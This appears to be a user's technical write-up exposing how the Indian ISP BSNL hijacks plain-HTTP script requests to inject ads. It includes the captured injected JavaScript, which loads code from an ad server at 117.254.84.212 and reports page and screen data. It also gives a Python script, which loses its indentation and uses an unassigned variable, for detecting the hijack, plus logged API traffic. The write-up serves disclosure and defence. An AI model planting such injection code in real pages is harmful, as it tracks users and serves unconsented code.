BSNL Ad Injection Network Documentation

1. BSNL Ad Injection Documentation:
2.  
3. Between the USER and the ISP (BSNL), when browsing any unsecured website (http), and that site happens to load a JS from an unsecured source (hence, the request has HTTP 'Referrer' header), the ISP monitors this request, hijacks the request and sends it's own script.
4.  
5. eg request:
6. GET /wp-includes/js/wp-emoji-release.min.js?ver=5.0.4 HTTP/1.1
7. Host: planetgoahomes.in
8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
9. Accept: */*
10. Accept-Language: en-US,en;q=0.5
11. Accept-Encoding: gzip, deflate
12. Referer: http://planetgoahomes.in/properties-to-sell/
13. Connection: keep-alive
14. Cookie: pum-2844=true; pvc_visits[0]=1553233919b610a1553234126b1003
15.  
16.  
17. Response:
18. !function(){var a="/wp-includes/js/wp-emoji-release.min.js?ver=5.0.4",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l="117.254.84.212:3000/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fwp-includes%2Fjs%2Fwp-emoji-release.min.js%3Fver%3D5.0.4%22%2C%22referer%22:%22http:%2F%2Fplanetgoahomes.in%2Fproperties-to-sell%2F%22%2C%22host%22:%22planetgoahomes.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:8%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}}catch(a){}}();
19.  
20.  
21. Once the Hijacking happens, it is paused for 65 seconds to reduce suspicion, so if the above request is duplicated within 65s, you will receive the expected response.
22. Also, the Hijacked response headers are very different from the original headers, where the Content-Type is application/x-javascript, instead of text/javascript.
23.  
24. Code to test the interval [Python]:
25. import socket
26. import time
27.  
28. def getD():
29. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
30. s.connect(("www-personal.umich.edu", 80))
31.  
32. msg += b'GET /~bazald/l/api/dynsections.js HTTP/1.1\r\n'
33. msg += b'Host: www-personal.umich.edu\r\n'
34. msg += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n'
35. msg += b'Accept: */*\r\n'
36. msg += b'Accept-Language: en-US,en;q=0.5\r\n'
37. msg += b'Accept-Encoding: gzip, deflate\r\n'
38. msg += b'Referer: http://www-personal.umich.edu/~bazald/l/api/_s_d_l__main_8h_source.html\r\n'
39. msg += b'Connection: Close\r\n'
40. msg += b'Cookie: BIGipServer~WEBHOSTING-PROD-MACC~WWW_PERSONAL_HTTP=2483540877.20480.0000\r\n'
41. msg += b'\r\n'
42.  
43. s.send(msg)
44. allR = b''
45.  
46. while True:
47. chunk = s.recv(16)
48. if chunk == b'':
49. s.close()
50. break
51. allR += chunk
52.  
53. return allR
54.  
55. ctr = 0
56. while True:
57. dd = getD()
58. if b"Content-Type: text/javascript" in dd:
59. ctr += 1
60. print('Not Hijacked')
61. else:
62. print('!!!!Hijacked!!!!')
63.  
64. #Adjust the sleep period to see changes, >= 65 will always result in hijacked script
65. time.sleep(65)
66.  
67.  
68. Once the above script is executed by the browser, it appends a new script into the DOM, along with the original script which was requested.
69. The injected script tag looks like this:
70. <script async="" src="//117.254.84.212:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fajax%2Flibs%2Fjquery%2F1.8.3%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Fdigg.com%2F%22%2C%22host%22:%22ajax.googleapis.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%7D&quot;&amp;screenheight=768&amp;screenwidth=1366&amp;tm=1559199614846&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
71.  
72. You can see the screen resolution is sent to the Ad server.
73.  
74. This script loads a massive 340KB obfuscated script file, tailored to the subscriber (USER) which includes their subscriber id and IP address.
75.  
76. The server itself is unreachable, and only listens to port 3000 for http requests.
77.  
78. If you open the root page of the Ad server (http://117.254.84.212:3000/), it will display the following:
79.  
80. ------------------------------------------
81. Express
82.  
83. Welcome to Express
84. ------------------------------------------
85.  
86. The server encompasses an AD API using JSON at http://117.254.84.212:3000/api/getnoti and http://117.254.84.212:3000/api/logerror (and maybe more) using GET and POST methods respectively
87.  
88. Example:
89.  
90. URL: http://117.254.84.212:3000/api/getnoti?tm=1559201611495&subscriberId=c2g4MzIyNDYyMzA1X3djZHJAYnNubC5pbg==&subscriberIP=<Snipped by me>&nadipdata="{\"url\":\"/ajax/libs/jquery/1.8.3/jquery.min.js\",\"referer\":\"http://digg.com/\",\"host\":\"ajax.googleapis.com\",\"categories\":[0],\"reputations\":[1],\"nadipdomain\":1}"&screenheight=768&screenwidth=1366&preadid=-1&cycle=false&_=1559201610551
91.  
92. [GET request]
93. Host: 117.254.84.212:3000
94. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
95. Accept: application/json, text/javascript, */*; q=0.01
96. Accept-Language: en-US,en;q=0.5
97. Accept-Encoding: gzip, deflate
98. Referer: http://digg.com/
99. Origin: http://digg.com
100. Connection: keep-alive
101.  
102. [Response]
103. {"message":"No Ad available. Error calculatedAd null 3.","error":true}
104.  
105. ------------------------------------------
106. Immediately after, the following request is made (hence proving BSNL is logging all Ad requests and errors with the USER's IP address):
107.  
108. URL: http://117.254.84.212:3000/api/logerror?tm=1559201611901
109.  
110. [POST request]
111. Host: 117.254.84.212:3000
112. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
113. Accept: application/json, text/javascript, */*; q=0.01
114. Accept-Language: en-US,en;q=0.5
115. Accept-Encoding: gzip, deflate
116. Referer: http://digg.com/
117. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
118. Content-Length: 378
119. Origin: http://digg.com
120. Connection: keep-alive
121. Cache-Control: max-age=0
122.  
123. [Query string]
124. tm 1559201611901
125.  
126. [Form data]
127. error No+data+in+getnoti
128. methodName loadFirstAd:+nadipdata:+{"message":"No+Ad+available.+Error+calculatedAd+null+3.","error":true}
129. params {"browser":"Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:67.0)+Gecko/20100101+Firefox/67.0","referer":"http://digg.com/","subscriberIP":"<Snipped by me>"}
130.  
131. [Response]
132. {"message":"Ok"}
133.  
134. Current solution:
135. The HTML injection is unsolved, but the Ad injection can be avoided by blocking the IP address 117.254.84.212, hence the AD script will never load.